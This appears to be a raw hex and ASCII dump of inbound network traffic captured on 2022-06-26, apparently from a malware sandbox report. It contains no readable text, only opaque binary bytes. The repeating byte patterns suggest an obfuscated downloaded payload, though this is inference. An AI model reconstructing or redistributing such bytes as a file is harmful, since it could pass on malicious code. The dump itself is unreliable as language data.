                                2022-06-26 07:42:48 UTC163INData Raw: 1c 25 7c ed 0d 1c 25 75 0d 2c 92 23 da 7e dd 0d 1c 25 df 4d 3e 65 25 dd dd 0d 1c 25 0d a8 01 da da 8d e5 db 1c 25 7c ed 0d 1c 25 75 0d 08 92 23 da 7e dd 0d 1c 25 df 4d 3e 65 25 dd dd 0d 1c 25 0d 84 01 da da 7c ed 0d 1c 25 75 0d bb db 23 da dd 59 c4 1c 25 df 09 db 1c 25 0d ee 6e 23 da 68 60 99 d8 da da 94 f9 8e 1c 25 66 f0 59 c4 1c 25 0d 90 70 23 da 66 60 99 d8 da da 0d 83 72 23 da 66 f5 68 60 9d d8 da da 0d 64 b9 23 da 66 60 9d d8 da da df 25 a5 25 25 0d cc 43 da da 7e ed 0d 1c 25 8d 0d db 1c 25 7c ed 0d 1c 25 75 0d d1 db 23 da 7e dd 0d 1c 25 df 4d 3e 65 25 dd dd 0d 1c 25 0d 4d 01 da da 8d 21 db 1c 25 7c ed 0d 1c 25 75 0d ad db 23 da 7e dd 0d 1c 25 df 4d 3e 65 25 dd dd 0d 1c 25 0d 29 01 da da 8d 31 92 1c 25 7c ed 0d 1c 25 75 0d 89 db 23 da 7e dd 0d 1c 25
                                Data Ascii: %|%u,#~%M>e%%%|%u#~%M>e%%|%u#Y%%n#h`%fY%p#f`r#fh`d#f`%%%C~%%|%u#~%M>e%%M!%|%u#~%M>e%%)1%|%u#~%
                                2022-06-26 07:42:48 UTC167INData Raw: 1c 25 a9 25 a9 25 25 25 a5 2d 25 2d 25 2d 25 2d 25 2d 25 2d 25 2d 25 2d 25 25 39 25 39 25 39 25 39 dc a9 67 a9 dc 2b 67 2b 25 41 25 41 25 25 25 39 e2 a5 22 a5 e2 27 22 27 25 25 25 25 25 25 25 25 25 25 25 25 2d 25 2d 25 25 25 25 25 25 25 25 25 25 25 25 25 35 1c c5 dc 3d dc 45 dc 09 45 09 45 da da 25 25 25 25 25 25 25 25 25 25 da da da da da da 35 dc 25 25 08 e0 1a 25 1a 27 1a 25 1a 27 1a 25 1a 25 1a 25 1a 27 35 dc da da da da da da da da da da da da da da fe 65 fe 65 fe 27 fe 27 da da da da da da da da 1a 25 1a 27 0a 25 1a 27 18 25 18 25 1a 25 1a 25 25 25 25 a5 25 a5 25 a5 25 25 25 25 da da da da da da da da da da da da da da da da da da da da 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 02 67 1a 25 1a 25
                                Data Ascii: %%%%%-%-%-%-%-%-%-%-%%9%9%9%9g+g+%A%A%%%9"'"'%%%%%%%%%%%%-%-%%%%%%%%%%%%%5=EEE%%%%%%%%%%5%%%'%'%%%'5ee''%'%'%%%%%%%%%%%%%EEEEEEEEEEEEEEEEg%%
                                2022-06-26 07:42:48 UTC171INData Raw: 25 25 71 4a 3e 3c 91 1c 91 91 4a 3e 25 25 25 25 22 40 99 79 44 3e 46 1e 4a 50 93 99 25 25 25 25 2c 50 40 97 54 75 40 97 8b 4a 97 48 3c 93 3e 40 1e 4a 50 93 99 40 97 25 25 25 22 40 99 7b 40 97 4e 44 4a 93 25 25 25 25 22 40 99 1e 50 97 97 40 93 99 79 8d 97 40 3c 89 24 89 25 25 25 25 24 93 99 40 97 91 4a 3e 46 40 89 69 40 3e 97 40 48 40 93 99 25 25 25 25 24 93 99 40 97 91 4a 3e 46 40 89 24 93 3e 97 40 48 40 93 99 25 25 25 25 7b 44 97 99 50 3c 91 2c 50 40 97 54 25 25 25 25 32 44 89 40 1e 8d 3c 97 79 4a 28 50 91 99 44 67 54 99 40 25 25 25 28 50 91 99 44 67 54 99 40 79 4a 32 44 89 40 1e 8d 3c 97 25 25 25 91 4e 99 97 91 40 93 1c 25 25 25 25 91 4e 99 97 3e 95 54 93 1c 25 25 25 71 4a 3c 89 71 44 87 97 3c 97 54 20 9d 1c 25 25 25 25 22 40 99 79 8d 97 40 3c 89 71 4a
                                Data Ascii: %%qJ><J>%%%%"@yD>FJP%%%%,P@Tu@JH<>@JP@%%%"@{@NDJ%%%%"@P@y@<$%%%%$@J>F@i@>@H@%%%%$@J>F@$>@H@%%%%{DP<,P@T%%%%2D@<yJ(PDgT@%%%(PDgT@yJ2D@<%%%N@%%%%N>T%%%qJ<qD<T %%%%"@y@<qJ
                                2022-06-26 07:42:48 UTC175INData Raw: 59 f5 59 f9 59 fd 59 01 59 05 59 09 59 0d 59 11 59 21 59 41 10 49 10 4d 10 51 10 55 10 59 10 5d 10 61 10 65 10 69 10 7d 10 9d 10 a5 10 a9 10 ad 10 b1 10 b5 10 b9 10 bd 10 c1 10 c5 10 d9 10 f9 10 01 10 05 10 09 10 0d 10 11 10 15 10 19 10 1d 10 21 10 35 5b 55 5b 5d 5b 61 5b 65 5b 69 5b 6d 5b 71 5b 75 5b 79 5b 7d 5b 95 5b b5 5b bd 5b c1 5b c5 5b c9 5b cd 5b d1 5b d5 5b d9 5b dd 5b ed 5b 0d 5b 15 5b 19 5b 1d 5b 21 5b 25 12 29 12 2d 12 31 12 35 12 49 12 69 12 71 12 75 12 79 12 7d 12 81 12 85 12 89 12 8d 12 91 12 a1 12 c1 12 c9 12 cd 12 d1 12 d5 12 d9 12 dd 12 e1 12 e5 12 e9 12 fd 12 1d 12 25 5d 29 5d 2d 5d 31 5d 35 5d 39 5d 3d 5d 41 5d 45 5d 5d 5d 7d 5d 85 5d 89 5d 8d 5d 91 5d 95 5d 99 5d 9d 5d a1 5d a5 5d b9 5d d9 5d e1 5d e5 5d e9 5d ed 5d f1 5d f5 5d f9 5d
                                Data Ascii: YYYYYYYYY!YAIMQUY]aei}!5[U[][a[e[i[m[q[u[y[}[[[[[[[[[[[[[[[[[![%)-15Iiquy}%])]-]1]5]9]=]A]E]]]}]]]]]]]]]]]]]]]]]]]
                                2022-06-26 07:42:48 UTC180INData Raw: e9 14 f5 14 f9 14 09 14 11 14 15 14 19 14 1d 14 21 14 25 5f 29 5f 2d 5f 31 5f 35 5f 39 5f 3d 5f 41 5f 45 5f 49 5f 4d 5f 51 5f 55 5f 59 5f 5d 5f 61 5f 65 5f 69 5f 6d 5f 71 5f 75 5f 79 5f 7d 5f 81 5f 85 5f 89 5f 8d 5f 91 5f 95 5f 99 5f 9d 5f a1 5f a5 5f a9 5f ad 5f b1 5f bf 5f d1 5f df 5f e3 5f f5 5f c4 5f 19 5f 29 16 39 16 41 16 45 16 49 16 4d 16 51 16 55 16 59 16 5d 16 61 16 65 16 69 16 6d 16 71 16 75 16 79 16 7d 16 81 16 85 16 89 16 8d 16 91 16 95 16 99 16 9d 16 a1 16 a5 16 a9 16 ad 16 b1 16 b5 16 b9 16 bd 16 c1 16 c5 16 c9 16 cd 16 d1 16 d5 16 d9 16 dd 16 e1 16 e5 16 e9 16 ed 16 f1 16 f5 16 f9 16 09 16 d0 16 d4 16 31 61 51 61 59 61 5d 61 61 61 65 61 69 61 6d 61 71 61 75 61 79 61 7d 61 81 61 85 61 89 61 8d 61 91 61 95 61 a1 61 c1 61 c9 61 cd 61 d1 61 d5
                                Data Ascii: !%_)_-_1_5_9_=_A_E_I_M_Q_U_Y_]_a_e_i_m_q_u_y_}_____________________)9AEIMQUY]aeimquy}1aQaYa]aaaeaiamaqauaya}aaaaaaaaaaaa
                                2022-06-26 07:42:48 UTC184INData Raw: 4e ac 99 59 ea 38 a5 bb c7 46 ac 3f d9 43 18 a5 db c7 82 ac 26 0d 50 99 25 58 af b3 3e a5 ac 0c 33 8b b1 b4 3c 81 b1 62 20 85 64 7d 3f 4b a2 3b 3e c0 7d 10 7b 6a 10 3e f8 7d 12 9b f0 f6 e5 c3 3c ca 2d 49 27 66 a5 ee 11 2d 83 a9 35 e7 91 a7 b5 b5 22 7d 71 7d 1e cd 00 11 fe d9 37 df 2d 32 e4 5e a9 0c e7 02 47 6e cd 2a d9 00 9f 37 d4 e9 9d 87 5f 8c b5 7d 6b d1 4b 13 fc 43 fc c3 00 83 02 33 ee 3a 6e 6d 49 33 a4 b7 09 73 2f fc 00 b5 57 24 e6 24 46 6d b6 6d 08 c9 2e c9 63 f7 35 44 c1 71 4b c6 b5 48 a4 03 09 2d d7 a5 d1 45 72 6c 92 b5 ea b5 2a b7 d6 a4 9e 09 92 39 5f a0 ad 07 71 e4 c7 49 77 c9 b9 37 6f 10 40 1a c0 29 80 7a 57 67 74 c5 cf 2c a8 84 c3 f9 2d cf ad 5f 7a 7f 24 48 c5 9b 75 0a 2e 62 84 ee 59 50 bf 00 a8 76 3b 1e a6 c9 08 7e b0 f5 bf 44 42 44 d2 8d 0a
                                Data Ascii: NY8F?C&P%X>3<b d}?K;>}{j>}<-I'f-5"}q}7-2^Gn*7_}kKC3:nmI3s/W$$Fmm.c5DqKH-Erl*9_qIw7o@)zWgt,-_z$Hu.bYPv;~DBD
                                2022-06-26 07:42:48 UTC187INData Raw: fc 57 57 f7 82 f9 23 51 2d e9 c7 0c 6f ad c7 ad 7b 86 00 16 56 e0 6c 6c 6c 63 e6 c8 ba 25 15 7f ee ac ac 2c 39 3b d3 d2 df 10 2a 31 85 37 86 fe 10 10 b0 25 f1 e0 19 21 12 88 ee 95 1f 2e e7 2b c1 e2 cb d8 22 35 f3 d6 0c eb da 27 d6 1a b6 1a de 25 6d ce 17 f3 d8 ac e7 61 25 25 25 25 24 20 73 69 d3 67 85 a7 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25
                                Data Ascii: WW#Q-o{Vlllc%,9;*17%!.+"5'%ma%%%%$ sig%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
                                2022-06-26 07:42:48 UTC191INData Raw: 4d 41 ff e3 b7 a0 66 07 74 70 3c e9 ac ac 6b c4 02 a2 ed 7f 9a 72 c7 f9 b1 bb cc b1 d2 34 bd ee e0 cd ba 96 60 60 66 43 40 f3 67 fe 13 9a a3 82 99 b2 44 d7 fb ca 00 fb bd ed c9 23 ef fa 71 93 5b 76 44 8f 8f 17 56 d9 46 d3 01 9c c1 bd 85 b7 0b 80 be 1d ce 5f 7a e2 2d 55 33 e9 75 38 fd 91 9b 53 3a e3 71 22 a2 78 ec b6 1d a5 2f 1e c5 e8 02 6a 0e 06 79 45 fc 5b 64 03 86 98 41 84 0d f6 dc c5 1f 14 98 1f 51 f1 f6 12 93 c5 4d 57 0c 0c 0c be 73 f5 48 92 be dd 7b 66 4c 5c c3 cb ae 42 94 ff f2 e7 07 30 20 e9 3f ee a2 7d 3b 45 e9 35 a5 ae c4 09 f9 84 2e 29 e0 44 6d 24 24 cc 5f 3c 2a 2a ea 40 40 40 c9 8f 38 11 84 df 65 3a 69 57 4a 91 fd 5d 91 c3 e5 33 15 83 e6 ce 07 a0 66 f9 b0 b0 87 8e b4 a4 ef ef 67 82 e6 80 90 d0 2f c2 f3 78 82 90 90 70 68 f6 ba 49 49 89 3f 00 00
                                Data Ascii: MAftp<kr4``fC@gD#q[vDVF_z-U3u8S:q"x/jyE[dAQMWsH{fL\B0 ?};E5.)Dm$$_<**@@@8e:iWJ]3fg/xphII?
                                2022-06-26 07:42:48 UTC195INData Raw: 23 2c e3 0c 24 3b 6c 3d 5d 92 98 80 1b 5c 28 ae 7d 6b 39 42 18 25 2e 30 47 29 12 fe af 54 63 0e cb 46 23 71 a3 31 ce 07 b3 cd 8f c1 66 cf d7 98 c4 28 73 e0 e0 dc 5c db 12 aa 05 46 f5 5b fb 60 24 36 21 59 be 19 06 5b dd d7 1e 65 55 6c aa 37 4c 66 21 d4 ec a8 f6 ef fb fd 8b ea a2 73 7f 55 4d 2e a1 9c 4d 2e bd a5 02 d2 e1 9b 20 c7 1a b9 bb ab fd 73 f3 80 42 94 09 ff 6f ca b9 18 f0 c9 5f 81 92 52 4b 75 dc e9 52 35 0f e0 61 09 78 79 f0 af 00 89 0a a4 68 16 7d f3 cd 18 fe 62 46 b9 51 9f ef be a4 49 0c 2e 4b 27 53 36 53 be bc 76 22 b7 cd 3e 0f b0 e7 c9 8b a8 b2 6e 9f 65 69 13 c7 00 85 c6 e0 51 82 3d 43 37 ad 0f d1 33 97 f2 ab d5 8f 00 16 f5 5f 44 89 3a 09 70 3a a5 e5 af 08 9c f1 5e 43 f8 e5 d3 5c 4f ba ed 6e 4c 84 d9 f2 07 78 46 3c 62 07 a1 1f 68 a6 fc 4e a0 02
                                Data Ascii: #,$;l=]\(}k9B%.0G)TcF#q1f(s\F[`$6!Y[eUl7Lf!sUM.M. sBo_RKuR5axyh}bFQI.K'S6Sv">neiQ=C73_D:p:^C\OnLxF<bhN
                                2022-06-26 07:42:48 UTC199INData Raw: 68 b7 0e 54 96 1f 6a b3 8d 2c 6c b1 29 ff d4 ec d7 47 31 95 47 5c fd 81 12 24 01 78 f4 44 c4 2b c7 ff 91 89 e3 4c 4e 75 9d b3 7f 73 41 8f be 07 92 d5 c3 37 99 35 eb 97 6f c4 f7 4c b6 6f 07 a4 11 79 e8 7c 07 5f b8 da 2c ea 16 d1 75 76 4b af 03 f4 92 26 69 ff bf 66 6a a2 1d eb c9 4e d3 1b 25 0c d8 cf 9a 84 41 e5 30 38 65 db 4d fb 16 5c bd 53 7f 59 74 04 d3 5f 5d 56 22 95 b6 86 20 82 f7 ea 84 ed 15 fd cf 50 79 63 3b 00 53 08 c9 d5 88 ad 1b de 76 98 85 a2 73 97 dd 5c f5 03 71 cd cb 8b 3f ff 23 24 82 ba 34 e9 0f 11 02 a9 de 6b d0 d3 2e fa 76 85 5a c1 5b 1d 4e b5 e4 55 3e 71 ef a5 da 4d f4 92 9c 01 9d 0c de 09 55 ae e6 23 d4 8b cf 19 88 28 30 26 76 b4 55 8f 2b 21 e9 e9 fb dc f8 8f 86 d0 d5 f4 4d 8c a2 ea 9f 67 6c 43 3d 10 05 8a 3e e9 b1 3a f0 97 95 fa 8a 3f 4f
                                Data Ascii: hTj,l)G1G\$xD+LNusA75oLoy|_,uvK&ifjN%A08eM\SYt_]V" Pyc;Svs\q?#$4k.vZ[NU>qMU#(0&vU+!MglC=>:?O
                                2022-06-26 07:42:48 UTC203INData Raw: 39 dc 7e 73 79 c2 4b 51 dc 98 33 f8 48 e4 e1 62 e4 9e 3f 72 45 27 04 4e 05 31 69 a4 15 c2 1e 11 1d 78 50 60 9d df fc 8d 08 2f 4a 80 5d 0c a5 d0 9d 46 11 19 9f 59 68 16 49 89 7e 3a ea 4f c3 11 79 f1 68 d7 9d ef 70 10 10 df 8f 5e d7 bf 08 b0 6d 7c 34 d3 49 4f 88 dd ae 12 c3 23 a3 54 e7 82 09 89 f5 df 1f ba 58 56 cb 64 12 3a 3c b6 75 6f 03 59 62 be 28 5c 08 32 bf 8f f5 05 4e 22 5f 81 25 83 d1 66 ee 90 95 f7 ce 42 b1 ad 3d c4 75 ba 04 aa 11 69 c4 35 7a 88 06 e0 5d 73 ac 33 79 58 3d 28 61 b5 3c 72 c5 e7 bf 56 60 b9 b1 a2 f5 b6 8e b0 6e 29 f2 18 25 b7 52 2d 3f fa 52 cf 5e f3 c1 08 b0 0a 0d 4f 17 7e 8a 04 a2 c5 70 1d bc 0a ec 34 52 44 50 e8 df 8b 09 b2 ca 98 ea b8 01 86 6e f6 d7 22 b1 9a 69 9c d2 c5 9f cc f1 a1 52 47 5e 44 61 30 60 2c f9 df 6f 87 18 bb bd 2d 65
                                Data Ascii: 9~syKQ3Hb?rE'N1ixP`/J]FYhI~:Oyhp^m|4IO#TXVd:<uoYb(\2N"_%fB=ui5z]s3yX=(a<rV`n)%R-?R^O~p4RDPn"iRG^Da0`,o-e
                                2022-06-26 07:42:48 UTC207INData Raw: 62 34 71 ee d1 8f e9 8e 05 6e 12 41 57 67 df b1 60 d2 2c ad 8d c9 94 ad 9d dc 2e 3a e4 8b df 52 b0 d5 57 18 85 4f 94 c3 89 81 57 ee e2 43 8a 01 21 cb bb 34 b3 39 9e 1a 52 fc 0a 69 12 f6 5b ec 01 e2 99 a1 42 da ea 57 e4 f4 9a b9 5a 2c 7d 3f 6d 22 8d 0b 5e 83 44 fd e3 47 6f ae 65 a3 24 8f fe 51 04 78 77 64 33 2e 81 48 d0 8d ee fd 53 2a 4a 41 e7 7a 01 f0 de 9b 6a 17 18 6d 3c 75 6d 3a ec b6 99 1f 49 00 23 e6 69 b1 bc 42 27 ec fe c2 b8 c8 7f 9c 39 e2 7b 66 f8 c7 60 8b 01 02 2a f4 11 d3 a8 e5 81 eb e9 47 be 6c ba a9 2a 8c 1a e2 60 11 04 a2 3b 69 39 4d d1 e3 70 3b 8e d7 78 67 e5 c5 f3 69 65 48 e2 ec 23 f2 59 93 bd 7b 07 c2 75 48 d4 ca 3c 72 b9 2b fb ca 34 e4 c9 f2 e9 4b a0 ee 1d 0b b9 37 c3 ec 2d 9a fc a3 12 fd a8 16 4c 4e d0 3e 36 3e 6a 85 3a 4e 7b 45 03 4b aa
                                Data Ascii: b4qnAWg`,.:RWOWC!49Ri[BWZ,}?m"^DGoe$Qxwd3.HS*JAzjm<um:I#iB'9{f`*Gl*`;i9Mp;xgieH#Y{uH<r+4K7-LN>6>j:N{EK
                                2022-06-26 07:42:48 UTC212INData Raw: e8 64 21 81 90 ce 85 4a 79 4f 53 c9 ea 03 40 6f b6 c1 db 05 be a7 0c 50 f8 fe 68 1d 32 28 fc eb 46 68 39 75 0e 60 6b a7 6f 57 e8 f3 a9 1c 24 05 7b 10 30 d3 c7 87 90 b3 27 22 43 fc 4a b5 b3 f1 a4 b0 f6 93 5a 3a f6 e7 5a 0c 3e 5e 11 78 f0 8a 20 d6 b5 6c 43 af cd d7 5c 0e 08 1c 17 9c 3b ca 59 7f 4d 6d 12 d3 25 59 6f c3 6d 48 92 d2 8b eb 8c 7d d0 1f 6e 81 af 15 d9 f5 23 0b a7 af 81 28 f5 ea 24 0f 30 38 1f 14 8a 6a e8 d2 f4 60 74 85 dd 38 2e b2 a8 df d7 ee d3 ad ac 9c 67 1d 24 bb eb 8f 35 71 d9 d0 31 10 0d c3 34 57 54 36 e5 67 af 91 5e 1e 61 4c 2e fe 95 5c 3a 32 f5 8a d3 8c 83 7d e8 50 a2 04 02 94 66 f3 05 20 18 84 58 2f 9b 87 1b 58 62 fc 72 91 cf 2f 4c 6f cc 77 b4 62 62 4d 4d 3c fc 49 88 5e 83 92 b2 c7 80 44 cf 5e ec 02 ce 74 0d 27 29 76 4d d7 07 be 45 23 fc
                                Data Ascii: d!JyOS@oPh2(Fh9u`koW${0'"CJZ:Z>^x lC\;YMm%YomH}n#($08j`t8.g$5q14WT6g^aL.\:2}Pf X/Xbr/LowbbMM<I^D^t')vME#
                                2022-06-26 07:42:48 UTC216INData Raw: 67 ef 43 5b 46 45 59 48 27 19 fb a7 c8 3e 02 dd 7c 96 2a 86 5c fc 9f f1 ac fb 32 48 fd 6f f1 8f 0e 4e cf 9d 06 ab 74 80 3c b8 12 14 17 ab 26 0c db de 86 bc 66 11 cd 7b e5 83 ff e6 b0 57 2a 2e 59 66 0f 89 79 1b 1e cb 53 1e 45 28 e4 3e f2 2f 13 4a 6b 75 6c ec 44 88 e7 bd 2e 27 e8 e3 27 01 70 fb 57 a1 49 75 67 35 9d 23 7b ad ea 69 45 69 ce 82 b9 3b c3 2e 18 7f 9e f7 2e 87 3d 3c 87 e6 6e 9f 11 27 59 73 01 ae 58 f3 9d 9b e9 05 06 16 d2 f7 c6 14 8e bb 0c d9 39 76 0d ed 42 5a 23 d7 68 b5 4b 65 6b ce e5 ae fe 10 db ca 9a f2 54 a9 e4 47 a9 18 8c ed cc 95 f4 9e 35 35 9c 19 69 e1 74 a2 87 71 9a 3c 2a c7 28 80 43 8c 2b a3 db 1e f1 23 67 22 2d be 5c b1 db 58 b9 28 6e 52 ec fc 36 57 2b 89 3c 95 44 ff a8 ef 42 8e 1a ee a0 52 28 8d f3 c5 de a0 b7 a2 d9 1b 5e 8b 8a bd b5
                                Data Ascii: gC[FEYH'>|*\2HoNt<&f{W*.YfySE(>/JkulD.''pWIug5#{iEi;..=<n'YsX9vBZ#hKekTG55itq<*(C+#g"-\X(nR6W+<DBR(^
                                2022-06-26 07:42:48 UTC219INData Raw: bb 8f a0 bf 0f b5 5d e1 01 30 8c 8d 5f 28 29 03 97 5f 6a 03 bd e6 f7 5a da cc 91 5a 8f c9 2e 46 f0 3d ee 84 4b 32 eb 96 9f 92 41 81 ec 14 32 fd 7a 38 49 41 f6 57 65 16 2a 3d 5e 6d 16 84 b2 99 4f f5 37 88 5c f8 62 07 a9 49 a2 75 81 04 f0 ae 0f b1 cf 9e 06 4b 63 b3 93 7b 10 5a 8e ad 32 a3 1b 78 c9 84 b6 53 1a d6 31 43 19 8b 18 7e c9 ff 0e b7 96 fd 66 f6 2a a9 5a 99 5c 24 2e 66 53 4a 03 e1 95 e4 97 0f be 43 3a 9c cf 32 e0 7f a8 33 e6 65 6d 11 dc 5f 98 74 2f 92 7a 70 00 7c cb 95 bf b0 d8 ce 75 a8 7e fa 61 3c c0 a3 9e 24 90 7d 83 98 9e ff 1a 1f 46 62 17 18 14 d1 32 92 79 27 ff bf 57 73 28 f6 89 93 d3 dc b7 51 26 00 a4 d6 16 d8 21 bb 8c 81 d0 fd 16 1a e1 f0 17 bf 28 b1 b7 7d e8 73 c2 f3 a3 56 01 d6 e5 31 b7 90 a0 ca 30 58 9e 7c f9 02 c1 f1 42 8a ab 7b 12 b1 bb
                                Data Ascii: ]0_()_jZZ.F=K2A2z8IAWe*=^mO7\bIuKc{Z2xS1C~f*Z\$.fSJC:23em_t/zp|u~a<$}Fb2y'Ws(Q&!(}sV10X|B{
                                2022-06-26 07:42:48 UTC223INData Raw: 3b 50 1f 78 a2 b5 c0 3c 5e fd d5 8a bc 01 b7 74 f9 78 05 7d 0c 5b 94 70 33 d7 65 d4 8a 97 38 a0 19 a0 63 a2 b6 92 bc 55 00 de d6 b1 d7 5a 03 28 e5 95 c9 2b 18 26 c3 67 9a d3 ef f3 07 57 27 63 d0 ba 1e 71 2e 00 d1 60 4c fc 20 80 8e 33 54 d3 79 cc f6 fb 77 1f f4 2f 79 4c 09 59 22 b3 bb 75 1b a3 62 11 b4 96 96 d0 3c ed fe f1 da cf 08 5a 87 50 67 44 4e 77 b8 7e 4c c5 ee 20 82 72 ed 77 dd a9 4d f0 e9 ec 7e d2 d9 15 b2 75 26 ab d4 31 14 2b e5 f2 67 2c e5 33 5f 4a b3 7c e1 71 76 58 03 1b 8f 63 57 e5 4b d1 6e fe 84 a6 00 f4 55 b9 2d b1 25 fb 09 b1 6c 1a 6f 61 8c 2b 75 b3 c1 b1 e2 eb fa 86 0e d1 38 c9 10 c6 96 36 ed 43 0b 8e bf 11 76 15 20 33 d3 5a d2 a6 a1 27 86 63 84 08 2e 16 12 fc 47 4f 87 4d 37 d9 ed c2 ed 16 69 3c f5 51 a3 b9 fd 63 36 ee 29 3d 94 0b b7 ec f6
                                Data Ascii: ;Px<^tx}[p3e8cUZ(+&gW'cq.`L 3Tyw/yLY"ub<ZPgDNw~L rwM~u&1+g,3_J|qvXcWKnU-%loa+u86Cv 3Z'c.GOM7i<Qc6)=
                                2022-06-26 07:42:48 UTC227INData Raw: 91 29 62 99 3a 85 d9 c6 48 45 62 c2 a8 bc ac fc 28 c7 82 55 2f f3 c4 4b 10 94 df ef 25 fd d6 48 07 84 a3 d8 60 35 f4 48 6a 21 b4 d8 87 bf fb 1a 6c 55 59 e3 02 ee c6 87 7f 16 97 c4 7f 92 7a ea a9 a2 ad 50 6d 5d 79 32 81 86 e7 71 84 e7 24 0b 3c ad 3a 27 41 fc 69 ac 30 fa 7e a3 2e 0b 81 2e b5 f8 9c e1 71 4b 80 14 55 ea a5 a8 09 4b a4 4e 37 18 65 e7 db 7e de 62 1c 0b 16 3b 9e ae 85 65 8f 06 89 72 c8 3a 30 f5 9a 8a 8e 5c 0e ea 34 44 4c e5 9d a8 b4 f5 13 69 65 e3 e7 02 b9 99 99 31 12 22 96 ea 8e ef 00 ac cf f4 15 08 cb 11 e5 17 dc 52 18 0c 78 00 d7 bf 44 a0 50 e2 39 88 d8 ef 00 8d 22 01 02 00 b1 f2 b8 11 9f d9 7b 36 c1 74 5a 56 f9 65 ca a5 da d5 be 81 a1 20 ae 0a 19 41 ec 6a fb ec 48 ad c8 0a fe 48 cf fb e0 36 4b c9 8e 8b 52 84 e2 5a 93 b7 5c 93 ef e2 9b a8 b5
                                Data Ascii: )b:HEb(U/K%H`5Hj!lUYzPm]y2q$<:'Ai0~..qKUKN7e~b;er:0\4DLie1"RxDP9"{6tZVe AjHH6KRZ\
                                2022-06-26 07:42:48 UTC231INData Raw: d2 39 1c 13 fd d6 f6 e1 e5 3e f6 14 86 48 d9 3d 10 bb b4 4d bd 13 38 be 17 61 97 f9 81 49 b9 fb 67 37 85 62 3f 07 c7 68 53 cc 54 a9 40 a3 db b8 11 30 61 54 ef 89 93 3e 64 fc ea 0c 4a 80 c0 bd 08 3c 75 82 c9 7f 68 7a bc 84 64 d0 ce ba d8 86 6e 25 ed 89 1a 85 35 61 d3 c6 ec 7d 71 5c 0d 9c 0e 11 6f 8b 2f f0 ee 71 95 35 0b b5 fd 4a 1b 42 f4 3e a9 77 5c 33 d1 96 51 89 83 22 64 2f 9b cf e3 bb dd fb c6 01 68 df 9a 52 a2 16 26 ff ef 56 05 86 62 da f9 9b c3 e6 e8 e1 0e d8 15 99 8d fb d1 79 ad 40 0e b9 bb 42 47 46 fd a6 7b f2 50 e9 60 8b a7 f1 6d a0 bb 96 8a 24 1b 79 2b 4b 7a e8 4d 83 b2 32 b6 44 9b ad 00 b6 bc ca 0a be 37 59 f6 55 6d 65 db 99 6e 89 c3 26 fc 06 36 fc 6b 53 55 cc de e2 82 2d 87 47 cd 4d 88 5c 20 48 2a 90 a7 40 7f 52 64 6b 90 ba 35 56 56 14 3c 44 52
                                Data Ascii: 9>H=M8aIg7b?hST@0aT>dJ<uhzdn%5a}q\o/q5JB>w\3Q"d/hR&Vby@BGF{P`m$y+KzM2D7YUmen&6kSU-GM\ H*@Rdk5VV<DR
                                2022-06-26 07:42:48 UTC235INData Raw: 14 8a f6 92 5b 62 7d 46 3c d6 d1 8e 14 92 c1 8e e8 18 48 f3 75 4e 19 67 33 b4 4b b4 92 29 90 e5 92 59 30 c4 28 3d 8f 87 2c 2d 3c 54 79 25 64 c4 2a a1 44 6b dd d6 38 60 b7 e1 9f f1 75 01 6d 9e 8f d9 1f 21 c5 ca 0f 3c 26 5c 0f 50 74 61 38 8a 8e 61 f1 c3 fb cc ff 16 44 7c 6f 3a 8a e6 41 d0 18 f2 ef 2c d7 e3 b0 51 65 b0 d6 00 13 3b 48 27 c9 18 ab 84 5d da 78 a5 f5 c6 4b ec 7c 76 39 0d 8e 9f 15 25 96 3c da 08 0f e8 67 73 51 ff 63 07 64 12 75 6c d0 c0 87 d3 05 27 ff 42 0b a9 57 44 c9 c6 47 29 84 97 0e 26 67 77 e6 2a 7a 58 3c f6 c4 2d 18 7b 4c d9 28 c9 e7 21 b9 40 0b 4b 00 81 4f ad e7 f9 0b 85 2b 95 92 30 95 b6 ad a3 43 10 b6 37 f5 4f 6f c9 c4 8f 71 fa 84 07 18 94 ed 84 84 a7 49 64 30 f4 2d a2 c5 1e 76 fb 6e 45 d8 16 aa 25 4e c7 24 5e 70 42 e1 f3 57 da e3 43 5c
                                Data Ascii: [b}F<HuNg3K)Y0(=,-<Ty%d*Dk8`um!<&\Pta8aD|o:A,Qe;H']xK|v9%<gsQcdul'BWDG)&gw*zX<-{L(!@KO+0C7OoqId0-vnE%N$^pBWC\
                                2022-06-26 07:42:48 UTC239INData Raw: af ee a7 01 73 1a 2e 59 61 c5 f4 20 5d 13 23 e8 74 9e 0b ac 6f 66 41 62 45 ee 3b c8 4b 9b 7b c6 a3 61 90 62 a5 8d ba e2 44 76 12 c4 f9 ef 8b 2f 34 39 dc a4 7a 90 8a b5 42 6e 97 0b 4b 6c 53 38 12 b5 47 37 b3 59 e4 a4 f4 46 61 00 32 3d f2 75 de 00 cf 4f ec 68 88 e6 de 00 1f 42 71 a5 97 b7 4a dc 76 3c db 3d 37 d4 56 23 18 86 61 10 3f 3c a4 86 0b c0 c4 9e 0c ec fc e3 ac b7 85 5a f1 d3 8f 60 d2 c1 87 f7 5e ce e7 9a 6f 2a 57 24 64 58 9c eb 9b 4a c0 29 51 a7 73 0a a8 36 42 11 50 c6 28 b5 ae 76 d8 52 34 47 3c fe c6 31 e6 76 b2 5a 29 41 6a 01 22 18 40 96 20 98 35 66 17 dc a0 ca 1e 2f 49 66 fb 2a 21 41 b9 f8 26 a1 8f 74 f0 1f e0 2d 9d 42 c7 05 d1 61 de dd 4c e4 42 19 76 1c a6 a1 ea 9a 24 51 4c 61 ca 2e 7c 7d 45 10 ed 11 1f dc 66 e8 96 52 02 8c b7 ff 8c ba 98 19 7c
